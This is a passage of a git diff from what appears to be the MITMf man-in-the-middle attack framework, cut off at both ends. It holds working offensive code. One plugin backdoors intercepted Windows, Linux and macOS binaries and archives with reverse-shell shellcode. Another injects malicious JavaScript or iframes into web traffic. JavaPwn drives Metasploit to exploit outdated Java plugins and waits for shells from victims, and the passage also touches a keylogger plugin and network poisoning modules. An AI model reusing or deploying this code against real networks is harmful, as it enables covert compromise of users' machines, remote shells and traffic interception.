(info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']): + #Create a virtual console + c_id = msf.call('console.create')['id'] + + #write the cmd to the newly created console + msf.call('console.write', [c_id, cmd]) + else: + #Create a virtual console + c_id = msf.call('console.create')['id'] + + #write the cmd to the newly created console + msf.call('console.write', [c_id, cmd]) + + def onConfigChange(self): + self.initialize(self.options) + + def convert_to_Bool(self, aString): + if aString.lower() == 'true': + return True + elif aString.lower() == 'false': + return False + elif aString.lower() == 'none': + return None + + def bytes_have_format(self, bytess, formatt): + number = self.magicNumbers[formatt] + if bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']: + return True + return False + + def binaryGrinder(self, binaryFile): + """ + Feed potential binaries into this function, + it will return the result PatchedBinary, False, or None + """ + + with open(binaryFile, 'r+b') as f: + binaryTMPHandle = f.read() + + binaryHeader = binaryTMPHandle[:4] + result = None + + try: + if binaryHeader[:2] == 'MZ': # PE/COFF + pe = pefile.PE(data=binaryTMPHandle, fast_load=True) + magic = pe.OPTIONAL_HEADER.Magic + machineType = pe.FILE_HEADER.Machine + + #update when supporting more than one arch + if (magic == int('20B', 16) and machineType == 0x8664 and + self.WindowsType.lower() in ['all', 'x64']): + add_section = False + cave_jumping = False + if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append': + add_section = True + elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump': + cave_jumping = True + + # if automatic override + if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic': + cave_jumping = True + + 
targetFile = pebin.pebin(FILE=binaryFile, + OUTPUT=os.path.basename(binaryFile), + SHELL=self.WindowsIntelx64['SHELL'], + HOST=self.WindowsIntelx64['HOST'], + PORT=int(self.WindowsIntelx64['PORT']), + ADD_SECTION=add_section, + CAVE_JUMPING=cave_jumping, + IMAGE_TYPE=self.WindowsType, + PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']), + SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'], + ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']), + PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower() + ) + + result = targetFile.run_this() + + elif (machineType == 0x14c and + self.WindowsType.lower() in ['all', 'x86']): + add_section = False + cave_jumping = False + #add_section wins for cave_jumping + #default is single for BDF + if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append': + add_section = True + elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump': + cave_jumping = True + + # if automatic override + if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic': + cave_jumping = True + + targetFile = pebin.pebin(FILE=binaryFile, + OUTPUT=os.path.basename(binaryFile), + SHELL=self.WindowsIntelx86['SHELL'], + HOST=self.WindowsIntelx86['HOST'], + PORT=int(self.WindowsIntelx86['PORT']), + ADD_SECTION=add_section, + CAVE_JUMPING=cave_jumping, + IMAGE_TYPE=self.WindowsType, + PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']), + SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'], + ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']), + PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower() + ) + + result = targetFile.run_this() + + elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF + + targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False) + targetFile.support_check() + + if targetFile.class_type == 0x1: + #x86CPU Type + targetFile = elfbin.elfbin(FILE=binaryFile, + OUTPUT=os.path.basename(binaryFile), + SHELL=self.LinuxIntelx86['SHELL'], + HOST=self.LinuxIntelx86['HOST'], + PORT=int(self.LinuxIntelx86['PORT']), + SUPPLIED_SHELLCODE=self.LinuxIntelx86['SUPPLIED_SHELLCODE'], + IMAGE_TYPE=self.LinuxType + ) + result = targetFile.run_this() + elif targetFile.class_type == 0x2: + #x64 + targetFile = elfbin.elfbin(FILE=binaryFile, + OUTPUT=os.path.basename(binaryFile), + SHELL=self.LinuxIntelx64['SHELL'], + HOST=self.LinuxIntelx64['HOST'], + PORT=int(self.LinuxIntelx64['PORT']), + SUPPLIED_SHELLCODE=self.LinuxIntelx64['SUPPLIED_SHELLCODE'], + IMAGE_TYPE=self.LinuxType + ) + result = targetFile.run_this() + + elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho + targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False) + targetFile.support_check() + + #ONE CHIP SET MUST HAVE PRIORITY in FAT FILE + + if targetFile.FAT_FILE is True: + if self.FatPriority == 'x86': + targetFile = machobin.machobin(FILE=binaryFile, + OUTPUT=os.path.basename(binaryFile), + SHELL=self.MachoIntelx86['SHELL'], + HOST=self.MachoIntelx86['HOST'], + PORT=int(self.MachoIntelx86['PORT']), + SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'], + FAT_PRIORITY=self.FatPriority + ) + result = targetFile.run_this() + + elif self.FatPriority == 'x64': + targetFile = machobin.machobin(FILE=binaryFile, + OUTPUT=os.path.basename(binaryFile), + SHELL=self.MachoIntelx64['SHELL'], + HOST=self.MachoIntelx64['HOST'], + PORT=int(self.MachoIntelx64['PORT']), + SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'], + FAT_PRIORITY=self.FatPriority + ) + result = 
targetFile.run_this() + + elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7': + targetFile = machobin.machobin(FILE=binaryFile, + OUTPUT=os.path.basename(binaryFile), + SHELL=self.MachoIntelx86['SHELL'], + HOST=self.MachoIntelx86['HOST'], + PORT=int(self.MachoIntelx86['PORT']), + SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'], + FAT_PRIORITY=self.FatPriority + ) + result = targetFile.run_this() + + elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007': + targetFile = machobin.machobin(FILE=binaryFile, + OUTPUT=os.path.basename(binaryFile), + SHELL=self.MachoIntelx64['SHELL'], + HOST=self.MachoIntelx64['HOST'], + PORT=int(self.MachoIntelx64['PORT']), + SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'], + FAT_PRIORITY=self.FatPriority + ) + result = targetFile.run_this() + + self.patched.put(result) + return + + except Exception as e: + print 'Exception', str(e) + mitmf_logger.warning("EXCEPTION IN binaryGrinder {}".format(e)) + return None + + def tar_files(self, aTarFileBytes, formatt): + "When called will unpack and edit a Tar File and return a tar file" + + print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB' + + if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']): + print "[!] TarFile over allowed size" + mitmf_logger.info("TarFIle maxSize met {}".format(len(aTarFileBytes))) + self.patched.put(aTarFileBytes) + return + + with tempfile.NamedTemporaryFile() as tarFileStorage: + tarFileStorage.write(aTarFileBytes) + tarFileStorage.flush() + + if not tarfile.is_tarfile(tarFileStorage.name): + print '[!] Not a tar file' + self.patched.put(aTarFileBytes) + return + + compressionMode = ':' + if formatt == 'gz': + compressionMode = ':gz' + if formatt == 'bz': + compressionMode = ':bz2' + + tarFile = None + try: + tarFileStorage.seek(0) + tarFile = tarfile.open(fileobj=tarFileStorage, mode='r' + compressionMode) + except tarfile.ReadError: + pass + + if tarFile is None: + print '[!] Not a tar file' + self.patched.put(aTarFileBytes) + return + + print '[*] Tar file contents and info:' + print '[*] Compression:', formatt + + members = tarFile.getmembers() + for info in members: + print "\t", info.name, info.mtime, info.size + + newTarFileStorage = tempfile.NamedTemporaryFile() + newTarFile = tarfile.open(mode='w' + compressionMode, fileobj=newTarFileStorage) + + patchCount = 0 + wasPatched = False + + for info in members: + print "[*] >>> Next file in tarfile:", info.name + + if not info.isfile(): + print info.name, 'is not a file' + newTarFile.addfile(info, tarFile.extractfile(info)) + continue + + if info.size >= long(self.FileSizeMax): + print info.name, 'is too big' + newTarFile.addfile(info, tarFile.extractfile(info)) + continue + + # Check against keywords + keywordCheck = False + + if type(self.tarblacklist) is str: + if self.tarblacklist.lower() in info.name.lower(): + keywordCheck = True + + else: + for keyword in self.tarblacklist: + if keyword.lower() in info.name.lower(): + keywordCheck = True + continue + + if keywordCheck is True: + print "[!] Tar blacklist enforced!" 
+ mitmf_logger.info('Tar blacklist enforced on {}'.format(info.name)) + continue + + # Try to patch + extractedFile = tarFile.extractfile(info) + + if patchCount >= int(self.userConfig['TAR']['patchCount']): + newTarFile.addfile(info, extractedFile) + else: + # create the file on disk temporarily for fileGrinder to run on it + with tempfile.NamedTemporaryFile() as tmp: + shutil.copyfileobj(extractedFile, tmp) + tmp.flush() + patchResult = self.binaryGrinder(tmp.name) + if patchResult: + patchCount += 1 + file2 = "backdoored/" + os.path.basename(tmp.name) + print "[*] Patching complete, adding to tar file." + info.size = os.stat(file2).st_size + with open(file2, 'rb') as f: + newTarFile.addfile(info, f) + mitmf_logger.info("{} in tar patched, adding to tarfile".format(info.name)) + os.remove(file2) + wasPatched = True + else: + print "[!] Patching failed" + with open(tmp.name, 'rb') as f: + newTarFile.addfile(info, f) + mitmf_logger.info("{} patching failed. Keeping original file in tar.".format(info.name)) + if patchCount == int(self.userConfig['TAR']['patchCount']): + mitmf_logger.info("Met Tar config patchCount limit.") + + # finalize the writing of the tar file first + newTarFile.close() + + # then read the new tar file into memory + newTarFileStorage.seek(0) + ret = newTarFileStorage.read() + newTarFileStorage.close() # it's automatically deleted + + if wasPatched is False: + # If nothing was changed return the original + print "[*] No files were patched forwarding original file" + self.patched.put(aTarFileBytes) + return + else: + self.patched.put(ret) + return + + def zip_files(self, aZipFile): + "When called will unpack and edit a Zip File and return a zip file" + + print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB' + + if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']): + print "[!] ZipFile over allowed size" + mitmf_logger.info("ZipFIle maxSize met {}".format(len(aZipFile))) + self.patched.put(aZipFile) + return + + tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8)) + tmpDir = '/tmp/' + tmpRan + tmpFile = '/tmp/' + tmpRan + '.zip' + + os.mkdir(tmpDir) + + with open(tmpFile, 'w') as f: + f.write(aZipFile) + + zippyfile = zipfile.ZipFile(tmpFile, 'r') + + #encryption test + try: + zippyfile.testzip() + + except RuntimeError as e: + if 'encrypted' in str(e): + mitmf_logger.info('Encrypted zipfile found. Not patching.') + return aZipFile + + print "[*] ZipFile contents and info:" + + for info in zippyfile.infolist(): + print "\t", info.filename, info.date_time, info.file_size + + zippyfile.extractall(tmpDir) + + patchCount = 0 + + wasPatched = False + + for info in zippyfile.infolist(): + print "[*] >>> Next file in zipfile:", info.filename + + if os.path.isdir(tmpDir + '/' + info.filename) is True: + print info.filename, 'is a directory' + continue + + #Check against keywords + keywordCheck = False + + if type(self.zipblacklist) is str: + if self.zipblacklist.lower() in info.filename.lower(): + keywordCheck = True + + else: + for keyword in self.zipblacklist: + if keyword.lower() in info.filename.lower(): + keywordCheck = True + continue + + if keywordCheck is True: + print "[!] Zip blacklist enforced!" + mitmf_logger.info('Zip blacklist enforced on {}'.format(info.filename)) + continue + + patchResult = self.binaryGrinder(tmpDir + '/' + info.filename) + + if patchResult: + patchCount += 1 + file2 = "backdoored/" + os.path.basename(info.filename) + print "[*] Patching complete, adding to zip file." 
+ shutil.copyfile(file2, tmpDir + '/' + info.filename) + mitmf_logger.info("{} in zip patched, adding to zipfile".format(info.filename)) + os.remove(file2) + wasPatched = True + else: + print "[!] Patching failed" + mitmf_logger.info("{} patching failed. Keeping original file in zip.".format(info.filename)) + + print '-' * 10 + + if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting. + mitmf_logger.info("Met Zip config patchCount limit.") + break + + zippyfile.close() + + zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED) + + print "[*] Writing to zipfile:", tmpFile + + for base, dirs, files in os.walk(tmpDir): + for afile in files: + filename = os.path.join(base, afile) + print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '') + zipResult.write(filename, arcname=filename.replace(tmpDir + '/', '')) + + zipResult.close() + #clean up + shutil.rmtree(tmpDir) + + with open(tmpFile, 'rb') as f: + tempZipFile = f.read() + os.remove(tmpFile) + + if wasPatched is False: + print "[*] No files were patched forwarding original file" + self.patched.put(aZipFile) + return + else: + self.patched.put(tempZipFile) + return + + def handleResponse(self, request, data): + + content_header = request.client.headers['Content-Type'] + client_ip = request.client.getClientIP() + + if content_header in self.zipMimeTypes: + + if self.bytes_have_format(data, 'zip'): + mitmf_logger.info("{} Detected supported zip file type!".format(client_ip)) + + process = multiprocessing.Process(name='zip', target=self.zip, args=(data,)) + process.daemon = True + process.start() + process.join() + bd_zip = self.patched.get() + + if bd_zip: + mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) + return {'request': request, 'data': bd_zip} + + else: + for tartype in ['gz','bz','tar']: + if self.bytes_have_format(data, tartype): + mitmf_logger.info("{} Detected supported tar file type!".format(client_ip)) + + process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,)) + process.daemon = True + process.start() + process.join() + bd_tar = self.patched.get() + + if bd_tar: + mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) + return {'request': request, 'data': bd_tar} + + + elif content_header in self.binaryMimeTypes: + for bintype in ['pe','elf','fatfile','machox64','machox86']: + if self.bytes_have_format(data, bintype): + mitmf_logger.info("{} Detected supported binary type!".format(client_ip)) + fd, tmpFile = mkstemp() + with open(tmpFile, 'w') as f: + f.write(data) + + process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,)) + process.daemon = True + process.start() + process.join() + patchb = self.patched.get() + + if patchb: + bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read() + os.remove('./backdoored/' + os.path.basename(tmpFile)) + mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) + return {'request': request, 'data': bd_binary} + + else: + mitmf_logger.debug("{} File is not of supported Content-Type: {}".format(client_ip, content_header)) + return {'request': request, 'data': data} \ No newline at end of file diff --git a/plugins/Inject.py b/plugins/Inject.py index 2b75e37..82877eb 100644 --- a/plugins/Inject.py +++ b/plugins/Inject.py @@ -53,18 +53,6 @@ class Inject(CacheKill, Plugin): self.match_str = options.match_str self.html_payload = options.html_payload - if self.white_ips: 
- temp = [] - for ip in self.white_ips.split(','): - temp.append(ip) - self.white_ips = temp - - if self.black_ips: - temp = [] - for ip in self.black_ips.split(','): - temp.append(ip) - self.black_ips = temp - if self.options.preserve_cache: self.implements.remove("handleHeader") self.implements.remove("connectionMade") @@ -82,8 +70,8 @@ class Inject(CacheKill, Plugin): #If you have MSF on another host, you may need to check prior to injection #print "http://" + request.client.getRequestHostname() + request.uri ip, hn, mime = self._get_req_info(request) - if self._should_inject(ip, hn, mime) and (not self.js_src == self.html_src is not None or not self.html_payload == ""): - if hn not in self.proxyip: #prevents recursive injecting + if self._should_inject(ip, hn, mime) and self._ip_filter(ip) and (hn not in self.proxyip): + if (not self.js_src == self.html_src is not None or not self.html_payload == ""): data = self._insert_html(data, post=[(self.match_str, self._get_payload())]) self.ctable[ip] = time.time() self.dtable[ip+hn] = True @@ -95,39 +83,28 @@ class Inject(CacheKill, Plugin): def _get_payload(self): return self._get_js() + self._get_iframe() + self.html_payload - def add_options(self, options): - options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.") - options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.") - options.add_argument("--html-payload", type=str, default="", help="String you would like to inject.") - options.add_argument("--html-file", type=argparse.FileType('r'), default=None, help="File containing code you would like to inject.") - options.add_argument("--match-str", type=str, default="", help="String you would like to match and place your payload before. ( by default)") - options.add_argument("--preserve-cache", action="store_true", help="Don't kill the server/client caching.") - group = options.add_mutually_exclusive_group(required=False) - group.add_argument("--per-domain", action="store_true", default=False, help="Inject once per domain per client.") - group.add_argument("--rate-limit", type=float, default=None, help="Inject once every RATE_LIMIT seconds per client.") - group.add_argument("--count-limit", type=int, default=None, help="Inject only COUNT_LIMIT times per client.") - group.add_argument("--white-ips", type=str, default=None, help="Inject content ONLY for these ips") - group.add_argument("--black-ips", type=str, default=None, help="DO NOT inject content for these ips") - - def _should_inject(self, ip, hn, mime): + def _ip_filter(self, ip): if self.white_ips is not None: - if ip in self.white_ips: + if ip in self.white_ips.split(','): return True else: return False if self.black_ips is not None: - if ip in self.black_ips: + if ip in self.black_ips.split(','): return False else: return True + return True + + def _should_inject(self, ip, hn, mime): + if self.count_limit == self.rate_limit is None and not self.per_domain: return True if self.count_limit is not None and self.count > self.count_limit: - #print "1" return False if self.rate_limit is not None: @@ -176,3 +153,17 @@ class Inject(CacheKill, Plugin): data = re.sub(r, post[i][1]+"\g", data) return data + + def add_options(self, options): + options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.") + options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. 
Injected via hidden iframe.") + options.add_argument("--html-payload", type=str, default="", help="String you would like to inject.") + options.add_argument("--html-file", type=argparse.FileType('r'), default=None, help="File containing code you would like to inject.") + options.add_argument("--match-str", type=str, default="", help="String you would like to match and place your payload before. ( by default)") + options.add_argument("--preserve-cache", action="store_true", help="Don't kill the server/client caching.") + group = options.add_mutually_exclusive_group(required=False) + group.add_argument("--per-domain", action="store_true", default=False, help="Inject once per domain per client.") + group.add_argument("--rate-limit", type=float, default=None, help="Inject once every RATE_LIMIT seconds per client.") + group.add_argument("--count-limit", type=int, default=None, help="Inject only COUNT_LIMIT times per client.") + group.add_argument("--white-ips", type=str, default=None, help="Inject content ONLY for these ips") + group.add_argument("--black-ips", type=str, default=None, help="DO NOT inject content for these ips") diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py new file mode 100644 index 0000000..1a479ba --- /dev/null +++ b/plugins/JavaPwn.py @@ -0,0 +1,231 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. 
+# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import string +import random +import threading +import sys +import logging + +from time import sleep +from core.msfrpc import Msfrpc +from core.utils import SystemConfig +from plugins.plugin import Plugin +from plugins.BrowserProfiler import BrowserProfiler + +mitmf_logger = logging.getLogger("mitmf") + +class JavaPwn(BrowserProfiler, Plugin): + name = "JavaPwn" + optname = "javapwn" + desc = "Performs drive-by attacks on clients with out-of-date java browser plugins" + tree_output = [] + version = "0.3" + has_opts = False + + def initialize(self, options): + '''Called if plugin is enabled, passed the options namespace''' + self.options = options + self.msfip = SystemConfig.getIP(options.interface) + + try: + msfcfg = options.configfile['MITMf']['Metasploit'] + except Exception, e: + sys.exit("[-] Error parsing Metasploit options in config file : {}".format(e)) + + try: + self.javacfg = options.configfile['JavaPwn'] + except Exception, e: + sys.exit("[-] Error parsing config for JavaPwn: {}".format(e)) + + self.msfport = msfcfg['msfport'] + self.rpcip = msfcfg['rpcip'] + self.rpcpass = msfcfg['rpcpass'] + + #Initialize the BrowserProfiler plugin + BrowserProfiler.initialize(self, options) + self.black_ips = [] + + try: + self.msf = Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary + self.msf.login('msf', self.rpcpass) + version = self.msf.call('core.version')['version'] + self.tree_output.append("Connected to Metasploit v{}".format(version)) + except Exception: + sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") + + def onConfigChange(self): + self.initialize(self.options) + + def startThread(self, options): + self.pwn() + + def rand_url(self): #generates a random url for our exploits (urls are generated with a / at the beginning) + return "/" + ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(5)) + + def get_exploit(self, java_version): + exploits = [] + + client_vstring = java_version[:-len(java_version.split('.')[3])-1] + client_uversion = int(java_version.split('.')[3]) + + for ver in self.javacfg['Multi'].iteritems(): + if type(ver[1]) is list: + for list_vers in ver[1]: + + version_string = list_vers[:-len(list_vers.split('.')[3])-1] + update_version = int(list_vers.split('.')[3]) + + if ('*' in version_string[:1]) and (client_vstring == version_string[1:]): + if client_uversion == update_version: + exploits.append(ver[0]) + elif (client_vstring == version_string): + if client_uversion <= update_version: + exploits.append(ver[0]) + else: + version_string = ver[1][:-len(ver[1].split('.')[3])-1] + update_version = int(ver[1].split('.')[3]) + + if ('*' in version_string[:1]) and (client_vstring == version_string[1:]): + if client_uversion == update_version: + exploits.append(ver[0]) + elif client_vstring == version_string: + if client_uversion <= update_version: + exploits.append(ver[0]) + + return exploits + + + def injectWait(self, url, client_ip): #here we inject an iframe to trigger the exploit and check for resulting sessions + #inject iframe + mitmf_logger.info("{} >> now injecting iframe to trigger exploit".format(client_ip)) + self.html_payload = "".format(self.msfip, self.msfport, url) #temporarily changes the code that the Browserprofiler plugin injects + + 
mitmf_logger.info('{} >> waiting for ze shellz, Please wait...'.format(client_ip)) + + exit = False + i = 1 + while i <= 30: #wait max 60 seconds for a new shell + if exit: + break + shell = self.msf.call('session.list') #poll metasploit every 2 seconds for new sessions + if len(shell) > 0: + for k, v in shell.iteritems(): + if client_ip in shell[k]['tunnel_peer']: #make sure the shell actually came from the ip that we targeted + mitmf_logger.info("{} >> Got shell!".format(client_ip)) + self.sploited_ips.append(client_ip) #target successfully owned :) + self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped + exit = True + break + sleep(2) + i += 1 + + if exit is False: #We didn't get a shell :( + mitmf_logger.info("{} >> session not established after 30 seconds".format(client_ip)) + + self.html_payload = self.get_payload() # restart the BrowserProfiler plugin + + def send_command(self, cmd, vic_ip): + try: + mitmf_logger.info("{} >> sending commands to metasploit".format(vic_ip)) + + #Create a virtual console + console_id = self.msf.call('console.create')['id'] + + #write the cmd to the newly created console + self.msf.call('console.write', [console_id, cmd]) + + mitmf_logger.info("{} >> commands sent successfully".format(vic_ip)) + except Exception, e: + mitmf_logger.info('{} >> Error occurred while interacting with Metasploit: {}:{}'.format(vic_ip, Exception, e)) + + def pwn(self): + self.sploited_ips = list() #store ip of pwned or not vulnerable clients so we don't re-exploit + while True: + if (len(self.dic_output) > 0) and self.dic_output['java_installed'] == '1': #only choose clients that we are 100% sure have the java plugin installed and enabled + + brwprofile = self.dic_output #self.dic_output is the output of the BrowserProfiler plugin in a dictionary format + + if brwprofile['ip'] not in self.sploited_ips: #continue only if the ip has not been already exploited + + vic_ip = brwprofile['ip'] + + mitmf_logger.info("{} >> client has java version {} installed!
Proceeding...".format(vic_ip, brwprofile['java_version'])) + mitmf_logger.info("{} >> Choosing exploit based on version string".format(vic_ip)) + + exploits = self.get_exploit(brwprofile['java_version']) # get correct exploit strings defined in javapwn.cfg + + if exploits: + + if len(exploits) > 1: + mitmf_logger.info("{} >> client is vulnerable to {} exploits!".format(vic_ip, len(exploits))) + exploit = random.choice(exploits) + mitmf_logger.info("{} >> choosing {}".format(vic_ip, exploit)) + else: + mitmf_logger.info("{} >> client is vulnerable to {}!".format(vic_ip, exploits[0])) + exploit = exploits[0] + + #here we check to see if we already set up the exploit to avoid creating new jobs for no reason + jobs = self.msf.call('job.list') #get running jobs + if len(jobs) > 0: + for k, v in jobs.iteritems(): + info = self.msf.call('job.info', [k]) + if exploit in info['name']: + mitmf_logger.info('{} >> {} already started'.format(vic_ip, exploit)) + url = info['uripath'] #get the url assigned to the exploit + self.injectWait(self.msf, url, vic_ip) + + else: #here we setup the exploit + rand_port = random.randint(1000, 65535) #generate a random port for the payload listener + rand_url = self.rand_url() + #generate the command string to send to the virtual console + #new line character very important as it simulates a user pressing enter + cmd = "use exploit/{}\n".format(exploit) + cmd += "set SRVPORT {}\n".format(self.msfport) + cmd += "set URIPATH {}\n".format(rand_url) + cmd += "set PAYLOAD generic/shell_reverse_tcp\n" #chose this payload because it can be upgraded to a full-meterpreter and its multi-platform + cmd += "set LHOST {}\n".format(self.msfip) + cmd += "set LPORT {}\n".format(rand_port) + cmd += "exploit -j\n" + + mitmf_logger.debug("command string:\n{}".format(cmd)) + + self.send_command(cmd, vic_ip) + + self.injectWait(rand_url, vic_ip) + else: + #this might be removed in the future since newer versions of Java break the signed applet attack (unless you have a valid cert) + mitmf_logger.info("{} >> client is not vulnerable to any java exploit".format(vic_ip)) + mitmf_logger.info("{} >> falling back to the signed applet attack".format(vic_ip)) + + rand_url = self.rand_url() + rand_port = random.randint(1000, 65535) + + cmd = "use exploit/multi/browser/java_signed_applet\n" + cmd += "set SRVPORT {}\n".format(self.msfport) + cmd += "set URIPATH {}\n".format(rand_url) + cmd += "set PAYLOAD generic/shell_reverse_tcp\n" + cmd += "set LHOST {}\n".format(self.msfip) + cmd += "set LPORT {}\n".format(rand_port) + cmd += "exploit -j\n" + + self.send_command(cmd, vic_ip) + self.injectWait(rand_url, vic_ip) + sleep(1) diff --git a/plugins/JsKeylogger.py b/plugins/JsKeylogger.py index c84655b..06bf464 100644 --- a/plugins/JsKeylogger.py +++ b/plugins/JsKeylogger.py @@ -17,10 +17,12 @@ # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 # USA # +import logging from plugins.plugin import Plugin from plugins.Inject import Inject -import logging + +mitmf_logger = logging.getLogger("mitmf") class jskeylogger(Inject, Plugin): name = "Javascript Keylogger" diff --git a/plugins/Replace.py b/plugins/Replace.py new file mode 100644 index 0000000..3f124dc --- /dev/null +++ b/plugins/Replace.py @@ -0,0 +1,105 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# 
License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +""" +Plugin by @rubenthijssen +""" + +import sys +import logging +import time +import re +from plugins.plugin import Plugin +from plugins.CacheKill import CacheKill + +mitmf_logger = logging.getLogger("mitmf") + +class Replace(CacheKill, Plugin): + name = "Replace" + optname = "replace" + desc = "Replace arbitrary content in HTML content" + implements = ["handleResponse", "handleHeader", "connectionMade"] + depends = ["CacheKill"] + version = "0.1" + has_opts = True + + def initialize(self, options): + self.options = options + + self.search_str = options.search_str + self.replace_str = options.replace_str + self.regex_file = options.regex_file + + if (self.search_str is None or self.search_str == "") and self.regex_file is None: + sys.exit("[-] Please provide a search string or a regex file") + + self.regexes = [] + if self.regex_file is not None: + for line in self.regex_file: + self.regexes.append(line.strip().split("\t")) + + if self.options.keep_cache: + self.implements.remove("handleHeader") + self.implements.remove("connectionMade") + + self.ctable = {} + self.dtable = {} + self.mime = "text/html" + + def handleResponse(self, request, data): + ip, hn, mime = self._get_req_info(request) + + if self._should_replace(ip, hn, mime): + + if self.search_str is not None and self.search_str != "": + data = data.replace(self.search_str, self.replace_str) + mitmf_logger.info("%s [%s] Replaced '%s' with '%s'" % (request.client.getClientIP(), request.headers['host'], self.search_str, self.replace_str)) + + # Did the user provide us with a regex file? + for regex in self.regexes: + try: + data = re.sub(regex[0], regex[1], data) + + mitmf_logger.info("%s [%s] Occurances matching '%s' replaced with '%s'" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1])) + except Exception: + logging.error("%s [%s] Your provided regex (%s) or replace value (%s) is empty or invalid. Please debug your provided regex(es)" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1])) + + self.ctable[ip] = time.time() + self.dtable[ip+hn] = True + + return {'request': request, 'data': data} + + return + + def add_options(self, options): + options.add_argument("--search-str", type=str, default=None, help="String you would like to replace --replace-str with. Default: '' (empty string)") + options.add_argument("--replace-str", type=str, default="", help="String you would like to replace.") + options.add_argument("--regex-file", type=file, help="Load file with regexes. 
File format: [tab][new-line]") + options.add_argument("--keep-cache", action="store_true", help="Don't kill the server/client caching.") + + def _should_replace(self, ip, hn, mime): + return mime.find(self.mime) != -1 + + def _get_req_info(self, request): + ip = request.client.getClientIP() + hn = request.client.getRequestHostname() + mime = request.client.headers['Content-Type'] + + return (ip, hn, mime) diff --git a/plugins/Responder.py b/plugins/Responder.py index bea6141..dbd7f69 100644 --- a/plugins/Responder.py +++ b/plugins/Responder.py @@ -19,18 +19,17 @@ # import threading +import sys from plugins.plugin import Plugin from twisted.internet import reactor from core.utils import SystemConfig from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner -from core.responder.wpad.WPADPoisoner import WPADPoisoner from core.responder.mdns.MDNSPoisoner import MDNSPoisoner from core.responder.nbtns.NBTNSPoisoner import NBTNSPoisoner from core.responder.fingerprinter.LANFingerprinter import LANFingerprinter from core.responder.wpad.WPADPoisoner import WPADPoisoner -from core.responder.kerberos.KERBServer import KERBServer class Responder(Plugin): name = "Responder" @@ -48,18 +47,47 @@ class Responder(Plugin): try: config = self.config['Responder'] + smbChal = self.config['MITMf']['SMB']['Challenge'] except Exception, e: sys.exit('[-] Error parsing config for Responder: ' 